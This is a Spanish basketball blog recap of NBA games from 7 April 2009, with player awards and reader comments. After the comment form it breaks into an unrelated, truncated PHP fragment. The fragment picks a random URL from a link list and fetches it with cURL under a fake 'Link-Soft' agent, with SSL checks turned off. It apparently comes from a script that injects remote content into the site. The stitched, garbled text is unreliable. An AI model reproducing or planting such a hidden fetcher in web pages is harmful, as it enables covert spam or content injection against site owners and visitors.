La crónica (07/04/2009)

08 de April de 2009 por txusma

Menos de 7 partidos para acabar la liga regular y todavía muchos interrogantes por desvelarse: el primer puesto de la regular, el segundo, el quinto y el octavo puesto del Este, el orden completo de arriba a bajo de los playoffs del Oeste… Y cada jornada es diferente de la anterior, así que las dudas se mantienen. Veamos lo que pasó ayer:

Hablemos del Este, que está apasionante. Orlando dio un paso atrás en su particular lucha con los Celtics debido a la derrota que le propinó Houston, liderados por Yao Ming. El chino anotó 26 puntos y recogió 16 rebotes, anulando además a Dwight Howard. Curioso que tras la lesión de T-Mac los Rockets se muestren más sólidos que antes. Están a 2 victorias de la segunda posición del Oeste y a medio pasito de la tercera, a la vez que aguantan las acometidas de Blazers y Hornets por detrás.

En la lucha por el 5º puntos, perdieron los 2 contendientes. Miami lo hizo en la prórroga frente a los Hornets, con triple de Rasual Butler para forzar la prórroga (y van 2 de casi consecutivos) y canasta de David West a falta de 8 segundos para el final para amarrar la victoria. Paul se quedó a una asistencia y un rebote del triple doble. Enfrente Wade y Beasley estuvieron apunto de llevarse el partido ellos solos. Lo que hace Flash es para ponerle un monumento.

Philadelphia, que venía lanzado, ha decidido descansar en el peor momento y ha encadenado 2 derrotas seguidas, la de ayer frente Charlotte. De esta manera los Bobcats rompen su racha de 3 derrotas consecutivas y vuelven a soñar con los Playoffs. Gerald Wallace, con 29 puntos y los últimos 4 del partido lideró la victoria naranja. Los Bulls hicieron su trabajo venciendo a los Knicks con un parcial de 15-0 en el último cuarto. Ahora se sitúan por encima de los Pistons y 3 victorias por encima de los Bobcats. Muy mal tendrían que hacerlo para quedarse fuera. Cerrando el Este, victoria de Atlanta frente a Toronto. Ahora mismo los Hawks son los que más tranquilos deben estar ya que su cuarta posición parece asegurada.

En el Oeste ganaron todos. Aparte de las comentadas victorias de Rockets y Hornets, también se impusieron Lakers, Spurs y Blazers. Los amarillos se impusieron a los Kings sobreponiéndose a un mal inicio de partido con actuación destacadísima de Pau Gasol. Los Spurs, por su parte, doblegaron a los Thunder, con Duncan y Gooden como destacados. La baja de Ginobili para lo que queda de temporada ha mermado y mucho sus oportunidades de título pero no dudamos que seguirán siendo duros de roer. Portland se impuso a Memphis con remontada incluída. A mediados del segundo cuarto perdían de 18 puntos y no fue hasta los últimos 13 segundos de partido que consiguieron ponerse por delante. 15 puntos de Rudy en 18 minutos y flojos partidos de Marc Gasol y Sergio Rodríguez.

En el partido sin historia de la jornada, victoria de los Wolves frente a unos Clippers, de nuevo, asolados por las lesiones.

PREMIOS

MVP: Destacable partido de Yao Ming en ataque y en defensa, pero lo de Chris Paul se puede considerar simplemente como una exhibición en toda regla. 26 puntos, 9 rebotes, 9 asistencias y 6 robos. Cerquita, cerquita del cuádruple doble.

Rookie: Buena noticia en los Heat. Hay vida aparte de Wade. Michael Beasley jugó un gran partido saliendo desde el banquillo, anotando 25 puntos y recogiendo 9 rebotes. Partidazo también de Eric Gordon, la única buena noticia de los Clippers este año.

Sorpresa: Lo difícil es no destacar en los Wolves (recordemos que Kevin Ollie es titular) pero aún así hay que aplaudir el partido de Ryan Gomes. 24 puntos y 13 rebotes. Optan al premio también los 20 puntos de Drew Gooden.

Decepción: Realmente no es una auténtica decepción porque lleva todo el año al mismo nivel, pero a mí me da mucha pena ver a Baron Davis anotar 5 de 16 puntos para 12 puntos. ¡Con lo que tú has sido!

Esfuerzo en vano: Cuando los Heat ganan, Wade opta siempre al MVP. Cuando pierden, Wade gana casi con toda seguridad el galardón del “Mayor esfuerzo en vano”. 32 puntos, 7 rebotes y 6 asistencias.

Comenta

3 comentarios a esta entrada

  1. Txusma dice:
    #1

    Tremenda la historia de Kirk Snyder que publica MARCA…
    http://www.marca.com/2009/04/08/baloncesto/1239192261.html

      Citar

  2. xapa_croack dice:
    #2

    ojala fuera asolada por las lesiones y no por las irresponsabilidades….snif snif

      Citar

  3. aro_pasado_no_newtoniano dice:
    #3

    duntleavy dimissió¡¡¡¡¡¡ (y el padre también)

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>